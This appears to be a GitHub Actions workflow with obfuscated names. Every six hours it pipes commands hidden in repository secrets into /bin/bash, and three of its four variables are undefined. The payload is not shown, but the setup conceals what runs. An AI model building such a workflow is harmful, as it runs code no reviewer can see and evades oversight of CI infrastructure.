name: chenzezhanggg
on:
  workflow_dispatch:
  schedule:
    - cron: '37 4/6 * * *'
jobs:  # 27673
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: chenzezhanggg
        env:
          xuvk08: ${{ secrets.xuvk08 }}
        run: |
          echo $xuvk08 | jq -r .h9 | /bin/bash
          echo $qalnq3 | jq -r .wj15 | /bin/bash
          echo $qlhxn58 | jq -r .aaa75390 | /bin/bash
          echo $wsn6437 | jq -r .hpov68547 | /bin/bash

